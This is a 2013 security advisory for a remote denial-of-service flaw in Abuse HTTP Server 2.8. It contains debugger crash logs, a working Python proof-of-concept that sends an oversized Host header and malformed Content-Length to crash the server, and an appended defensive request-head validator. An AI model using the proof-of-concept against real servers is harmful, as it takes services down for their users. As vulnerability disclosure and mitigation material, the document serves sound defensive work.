
Abuse HTTP Server 2.8 Denial Of Service

30 Sep 2013 00:00:00 | Reported by Zico Ekel | Type: packetstorm | Source: packetstormsecurity.com

Abuse HTTP Server 2.8 Remote DoS Vulnerability on Windows

Code
`Advisory Information :  
======================  
Title : Abuse HTTP Server 2.8 - Remote Denial Of Service  
Advisory ID : Cr02013-002  
Product : HTTP Server  
Vendor : SmartUX  
Vulnerable Version(s) : 2.8 and probably prior releases  
Tested Version : 2.8  
Tested On : Windows XP, Windows 7  
Vulnerability Type / CWE ID : Improper Resource Shutdown or Release / [CWE-404]  
Risk Level : High  
CVSSv2 Base Score : 9.7 (AV:N/AC:L/Au:N/C:N/I:P/A:C/E:F/RL:U/RC:C/CDP:LM/TD:H/CR:L/IR:L/AR:H)  
Discovered By : Zico (Zee Eichel) Ekel of cr0security - zee[at]cr0security.com - http://www.cr0security.com  
  
  
Introduction :  
==============  
  
Abuse HTTP Server is a small program designed to act as a web server.  
  
- Based on / Copied from : http://abuse-httpd.sourceforge.net/  
  
  
Advisory Details:  
=================  
Abuse HTTP Server is vulnerable to a remote denial of service (DoS). An attacker can make the server drop the connection of a client that is connected to it.  
  
  
Proof Of Concept :  
==================  
The attacker runs the remote DoS code below against the remote server host,  
and the connection between the server and the Android client is disconnected or terminated.  
  
With debugging (log captured using OllyDbg) :  
  
Log data, item 3  
Address=7C8106E9 (crash address)  
Message=New thread with ID 000006D0 created  
Log data, item 2  
Message=Thread 000006D0 terminated, exit code 0  
Log data, item 1  
Message=Thread 00000794 terminated, exit code CB (203.)  
Log data, item 0  
Message=Process terminated, exit code CB (203.)  
  
Register FPU log :  
  
EAX 00000000  
ECX 7C800000 kernel32.7C800000  
EDX 7C97B120 ntdll.7C97B120  
EBX 00000000  
ESP 0012EDD4  
EBP 0012EED0  
ESI 7C90DE50 ntdll.ZwTerminateProcess  
EDI 000000CB  
EIP 7C90E4F4 ntdll.KiFastSystemCallRet  
C 0 ES 0023 32bit 0(FFFFFFFF)  
P 1 CS 001B 32bit 0(FFFFFFFF)  
A 0 SS 0023 32bit 0(FFFFFFFF)  
Z 1 DS 0023 32bit 0(FFFFFFFF)  
S 0 FS 003B 32bit 7FFDE000(FFF)  
T 0 GS 0000 NULL  
D 0  
O 0 LastErr ERROR_CLASS_HAS_WINDOWS (00000584)  
EFL 00000246 (NO,NB,E,BE,NS,PE,GE,LE)  
ST0 empty -??? FFFF 00FF00FF 00FF00FF  
ST1 empty -??? FFFF 00FF00FF 00FF00FF  
ST2 empty -??? FFFF 00FE00B2 006E007A  
ST3 empty -??? FFFF 00FE00B2 006B0077  
ST4 empty -NAN FFFF FFB36B77 FFB36E7A  
ST5 empty -??? FFFF 00FF00B3 006B0077  
ST6 empty -??? FFFF 00000000 00000000  
ST7 empty -??? FFFF 00800080 00800080  
3 2 1 0 E S P U O Z D I  
FST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT)  
FCW 1372 Prec NEAR,64 Mask 1 1 0 0 1 0  
  
SEH chain of main thread:  
  
Address SE handler  
0012FC50 kernel32.7C839AC0  
0012FCA8 Abuse.0040D7E3  
0012FD78 USER32.7E44048F  
0012FDD8 USER32.7E44048F  
0012FEF0 USER32.7E44048F  
0012FF50 USER32.7E44048F  
0012FFE0 kernel32.7C839AC0  
  
Sample dummy tool (disconnect only)  
===================================  
  
--- Python Remote DOS code ---  
  
#!/usr/bin/python  
  
import socket  
import os  
import sys  
  
crash = "0" * 504  
  
buffer="GET / HTTP/1.1\r\n"  
buffer+="Host: " + crash + "\r\n"  
buffer+="Content-Type: application/x-www-form-urlencoded\r\n"  
buffer+="User-Agent: Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1\r\n"  
buffer+="Content-Length : 1048580\r\n\r\n"  
  
print "[*] Exploit c0ded by Zee Eichel - zee[at]cr0security.com"  
print "[*] Change some option in code with your self"  
print "[*] Connect to host and send payload"  
  
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )  
expl.connect(("192.168.1.101", 80))  
expl.send(buffer)  
print "[*] Server Disconected"  
expl.close()  
  
------------- EOF -------------  
  
Report-Timeline :  
=================  
29/09/2013 : Vendor Contacted / No response.  
30/09/2013 : Public Disclosure.  
  
  
Remediation :  
=============  
No remediation step was available from the vendor as of this public disclosure.  
  
  
References :  
============  
- Common Weakness Enumeration (CWE) - http://cwe.mitre.org  
- Share KM - http://abuse-httpd.sourceforge.net/  
  
  
About Cr0security :  
===================  
Cr0security is a company working in information technology, especially computer  
security systems, network security, and secure application development. Responding  
to the public's need for information systems with better security, Cr0security is  
ready to help you reach a secure state and work comfortably on your networks and  
computers. In software development we also apply "Secure Programming", so that the  
security of the applications, the data, and the computer is strictly maintained.  
Besides acting as your consultant, we can act as your partner to achieve the best  
solution.  
  
  
Contact Cr0security :  
=====================  
Email : info[at]cr0security.com  
Website : http://www.cr0security.com  
  
  
Disclaimer :  
============  
The information provided in this advisory is provided "as is" without warranty  
of any kind. Cr0security disclaims all warranties, either express or implied,  
including the warranties of merchantability and fitness for a particular purpose.  
In no event shall Cr0security or its suppliers be liable for any damages whatsoever  
including direct, indirect, incidental, consequential, loss of business profits or  
special damages, even if Cr0security or its suppliers have been advised of the  
possibility of such damages. Some states do not allow the exclusion or limitation  
of liability for consequential or incidental damages so the foregoing limitation may  
not apply.  
`
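
Since the advisory reports no vendor fix, one mitigation is to validate request heads before they reach the server. The following is an added example, not part of the advisory or of Abuse HTTP Server: a head checker that flags the three unusual features visible in the PoC request (a 504-byte `Host` value, whitespace before the colon in `Content-Length`, and a body length declared on a `GET`). The advisory does not say which of these causes the termination; the function name and both limits are assumptions.

```python
# Added example: pre-parse validation of an HTTP/1.1 request head, as a filter
# placed in front of a fragile server might apply it. Both limits are assumptions.
MAX_HOST_LEN = 255   # assumed cap on the Host header value, in bytes
MAX_GET_BODY = 0     # assumed policy: GET/HEAD requests declare no body

def inspect_request_head(raw: bytes) -> list:
    """Return a list of findings; an empty list means the head passed."""
    findings = []
    head, sep, _ = raw.partition(b"\r\n\r\n")
    if not sep:
        return ["incomplete head: no CRLFCRLF terminator"]
    lines = head.split(b"\r\n")
    parts = lines[0].split(b" ")
    if len(parts) != 3 or not parts[2].startswith(b"HTTP/"):
        return ["malformed request line"]
    method = parts[0].decode("ascii", "replace")
    hosts = 0
    for line in lines[1:]:
        name, colon, value = line.partition(b":")
        if not colon:
            findings.append("header line without colon")
            continue
        # RFC 7230 section 3.2.4: whitespace between field name and colon is rejected
        if name != name.strip() or not name:
            findings.append(f"whitespace around field name {name!r}")
        key = name.strip().lower()
        value = value.strip()
        if key == b"host":
            hosts += 1
            if len(value) > MAX_HOST_LEN:
                findings.append(f"Host value is {len(value)} bytes (limit {MAX_HOST_LEN})")
        elif key == b"content-length":
            if not value.isdigit():
                findings.append("non-numeric Content-Length")
            elif method in ("GET", "HEAD") and int(value) > MAX_GET_BODY:
                findings.append(f"{method} declares a {int(value)}-byte body")
    if hosts != 1:
        findings.append(f"expected exactly one Host header, saw {hosts}")
    return findings

# Constructed samples: the first has the same shape as the advisory's request.
SAMPLE_BAD = (b"GET / HTTP/1.1\r\nHost: " + b"0" * 504 +
              b"\r\nContent-Length : 1048580\r\n\r\n")
SAMPLE_OK = b"GET /index.html HTTP/1.1\r\nHost: www.example.test\r\n\r\n"

if __name__ == "__main__":
    for label, req in (("bad", SAMPLE_BAD), ("ok", SAMPLE_OK)):
        print(label, inspect_request_head(req) or "clean")
```

A proxy using this check would answer 400 and close the connection whenever the list is non-empty, so the request never reaches the backend.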
